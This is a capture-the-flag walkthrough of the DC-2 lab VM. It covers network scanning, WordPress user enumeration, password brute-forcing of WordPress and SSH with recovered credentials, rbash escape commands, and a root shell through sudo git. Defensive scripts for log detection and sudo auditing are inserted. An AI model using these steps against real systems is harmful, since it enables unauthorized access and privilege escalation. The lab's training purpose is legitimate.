[DC Penetration Series] DC-2 Lab

Start with an ARP scan

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
192.168.100.23  00:0c:29:64:16:07       VMware, Inc.
192.168.100.254 00:50:56:ef:65:1b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded

Then an nmap scan

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n -p- 192.168.100.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-01 19:32 EST
Nmap scan report for 192.168.100.23
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:64:16:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.37 ms 192.168.100.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

Port 80 (HTTP) and port 7744 (SSH) are open.
Try opening the site in a browser.

Hmm. We’re having trouble finding that site.

We can’t connect to the server at dc-2.

If that address is correct, here are three other things you can try:

    Try again later.
    Check your network connection.
    If you are connected but behind a firewall, check that Firefox has permission to access the Web.

The URL redirects to http://dc-2/

Edit the hosts file

/etc/hosts (Linux)
C:\Windows\System32\drivers\etc\hosts (Windows)
After adding the entry for dc-2, the site loads.

flag1 found

The site is built on WordPress.
The flag hints that we need to log in; if flag2 cannot be found, log in with a different account.

Use dirsearch to find the login page

Found http://dc-2/wp-admin/
Access succeeds.
Start brute-forcing.
Kali password attack tool: CeWL usage guide

┌──(root㉿kali)-[~/Desktop]
└─# cewl http://dc-2/ -w /root/Desktop/dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

WPScan, a scanner built specifically for WordPress

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://dc-2/ [192.168.100.23]
[+] Started: Thu Feb  1 20:12:07 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-01-16T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Feb  1 20:12:10 2024
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 16.619 KB
[+] Data Received: 21.289 MB
[+] Memory used: 177.188 MB
[+] Elapsed time: 00:00:03

Three usernames were found; put them into user.txt

┌──(root㉿kali)-[~/Desktop]
└─# vim user.txt  
                                                                                                                                                 
┌──(root㉿kali)-[~/Desktop]
└─# cat user.txt                               
admin
jerry
tom

Start brute-forcing

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -U '/root/Desktop/user.txt'  -P '/root/Desktop/dict.txt' 

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

Log in as jerry and find flag2 under Pages.

It hints at another path: we already have usernames and passwords, so think back to the SSH port 7744 found earlier and brute-force it.

Same approach as DC-9: Hydra.

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L user.txt -P dict.txt ssh://192.168.100.23:7744 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-01 20:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://192.168.100.23:7744/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 571 to do in 00:04h, 13 active
[STATUS] 105.67 tries/min, 317 tries in 00:03h, 400 to do in 00:04h, 13 active
[7744][ssh] host: 192.168.100.23   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-01 20:36:40
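From the defender's side, the hydra run above leaves a very recognisable trace in sshd's auth.log: a burst of failed passwords from one source spread over several accounts, followed by one accepted login. The script below is an added example, not part of this write-up; the log lines it processes are constructed to mirror that run (the source IP and ports are assumed values).

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd "Failed password" / "Accepted password|publickey" lines as written to auth.log.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse_events(log_text, year=2024):
    """Yield (timestamp, outcome, user, source_ip) for every sshd auth line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["outcome"], m["user"], m["ip"]

def detect_password_bruteforce(log_text, window_sec=60, min_failures=10, min_users=2):
    """Flag each source IP with >= min_failures failed logins inside window_sec
    spread over >= min_users accounts, and record any later accepted login."""
    by_ip = defaultdict(list)
    for ev in sorted(parse_events(log_text)):
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, events in by_ip.items():
        fails = [e for e in events if e[1] == "Failed"]
        for i, first in enumerate(fails):
            window = [e for e in fails[i:] if (e[0] - first[0]).total_seconds() <= window_sec]
            users = {e[2] for e in window}
            if len(window) >= min_failures and len(users) >= min_users:
                later = [e[2] for e in events if e[1] == "Accepted" and e[0] >= first[0]]
                alerts[ip] = {"failures": len(window), "users": sorted(users), "later_success": later}
                break
    return alerts

def constructed_sample_log():
    """Constructed auth.log excerpt shaped like the hydra run above: three accounts
    tried from one source, ending in one accepted password. Not real captured data."""
    users = ["admin", "jerry", "tom"]
    lines = [f"Feb  1 20:30:{5 + i:02d} DC-2 sshd[{1200 + i}]: Failed password for "
             f"{'invalid user ' if users[i % 3] == 'admin' else ''}{users[i % 3]} "
             f"from 192.168.100.251 port {51000 + i} ssh2" for i in range(30)]
    lines.append("Feb  1 20:36:40 DC-2 sshd[1450]: Accepted password for tom "
                 "from 192.168.100.251 port 51890 ssh2")
    lines.append("Feb  1 20:40:00 DC-2 sshd[1500]: Accepted publickey for jerry "
                 "from 192.168.100.10 port 40000 ssh2")
    return "\n".join(lines)
```

The hydra [DATA] line above shows 16 parallel tasks and more than 100 tries per minute, so the default window of 10 failures in 60 seconds triggers well before the password is found; an accepted login recorded in later_success is the signal to treat that account as compromised.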

Try connecting over SSH.

After the SSH login, less and vi can be used to view files.

┌──(root㉿kali)-[~]
└─# ssh tom@192.168.100.23 -p 7744 
The authenticity of host '[192.168.100.23]:7744 ([192.168.100.23]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.100.23]:7744' (ED25519) to the list of known hosts.
tom@192.168.100.23's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ more flag3.txt
-rbash: more: command not found
tom@DC-2:~$ 
tom@DC-2:~$ less flag3.txt

Because of the restricted shell (rbash, which means very limited privileges and many commands unavailable), commands such as type, cat, more and vim cannot be used to view the file.

Bypassing rbash

Method 1: bypass through the vi editor
(1) vi filename  // any filename will do
(2) type :set shell=/bin/sh and press Enter
(3) type :shell
(4) set the environment variable: export PATH=/usr/sbin:/usr/bin:/sbin:/bin
Method 2: set a shell via BASH_CMDS

BASH_CMDS[x]=/bin/bash   # defines an x command that maps to a shell
x    # equivalent to running the shell
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

This should be related to jerry; move to jerry's home directory and flag4 is there.

tom@DC-2:~$ ls
123  denglu  flag3.txt  tom  usr
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ cd ..
tom@DC-2:/home$ ls
jerry  tom
tom@DC-2:/home$ cd jerry
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ 

Again it hints at git privilege escalation.

Git privilege escalation

First switch to jerry; the password was found earlier.

Method 1:

sudo -l  // list the sudo commands available to this user

Sure enough, git is there

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 

sudo git help config  // forces an interactive pager
!/bin/bash  (bash can also be replaced with sh)  // opens a shell with root privileges
jerry@DC-2:~$ sudo git help config  // forces an interactive pager
root@DC-2:/home/jerry# 

Method 2:

sudo git -p help
!/bin/bash  (bash can also be replaced with sh)
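The rbash escape and the sudo git escalation above share one root cause: an interactive program that can hand its user a shell (a pager's ! escape, vi's :shell, git's pager when showing help) is reachable either through a restricted shell's PATH or through a NOPASSWD sudo rule. The audit below is an added example, not part of this write-up; the SHELL_ESCAPE_CAPABLE set is an assumption covering the programs used here, and the sample sudo -l text is constructed to match jerry's.

```python
import os
import re

# Interactive programs that let the user who runs them drop to a shell: a pager's
# "!" escape, vi's ":set shell" + ":shell", git's pager when it shows help. This
# set is an assumption made for this example; it covers what the write-up used.
SHELL_ESCAPE_CAPABLE = {"git", "vi", "vim", "less", "more", "man"}

# One "(runas) TAG: /path/cmd, /path/cmd" rule line from the 'sudo -l' listing.
SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

def audit_sudo_rules(sudo_l_output):
    """Return [(binary, nopasswd)] for rules that let this user run an
    escape-capable program as root, parsed from 'sudo -l' output."""
    findings, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        m = SUDO_RULE_RE.match(line) if in_rules else None
        if not m or m["runas"].split(":")[0].strip() not in ("root", "ALL"):
            continue
        for cmd in m["cmds"].split(","):
            binary = cmd.strip().split()[0]
            if os.path.basename(binary) in SHELL_ESCAPE_CAPABLE:
                findings.append((binary, "NOPASSWD:" in m["tags"]))
    return findings

def audit_restricted_path(path_value, list_dir=os.listdir):
    """For an rbash user, report escape-capable programs still reachable via
    PATH. list_dir is injectable so the check can run on a constructed listing."""
    reachable = []
    for directory in path_value.split(":"):
        try:
            names = set(list_dir(directory))
        except OSError:
            continue
        reachable += sorted(directory + "/" + n for n in names & SHELL_ESCAPE_CAPABLE)
    return reachable

# Constructed input mirroring the 'sudo -l' output shown above for jerry.
SAMPLE_SUDO_L = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""
```

Running audit_sudo_rules on a user's own sudo -l output or audit_restricted_path on the PATH handed to an rbash account gives the list of entries that need to be removed or replaced with a non-interactive wrapper.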

The final flag is in the root directory

Done!
